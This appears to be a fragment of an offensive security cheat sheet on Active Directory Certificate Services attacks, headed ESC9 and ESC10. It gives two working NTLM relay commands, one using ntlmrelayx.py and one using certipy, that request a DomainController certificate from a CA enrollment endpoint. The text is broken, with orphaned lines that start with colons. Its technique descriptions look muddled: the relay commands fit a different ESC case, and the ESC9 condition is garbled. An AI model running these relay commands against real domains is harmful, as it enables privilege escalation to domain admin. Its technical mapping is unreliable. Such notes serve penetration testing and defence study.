HackTricks ADCS 2021

: Obtain a certificate for the relayed account (e.g., a computer account, domain admin).

ESC9 – No Security Extension in Template

Condition: Certificate template has CT_FLAG_NO_SECURITY_EXTENSION, which bypasses permissions on the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT.

```bash
# Relay NTLM auth from a compromised host to ADCS
ntlmrelayx.py -t http://ca.contoso.com/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
certipy relay -target http://ca.contoso.com -template DomainController
```

: Modify template to enable ESC1 conditions (e.g., allow SAN supply), then request as ESC1.

: Similar to ESC1, request a certificate for any user.

ESC10 – Weak Authentication on CA

Condition: CA’s authentication strength is set to low (e.g., Windows Integrated Auth without any additional protection).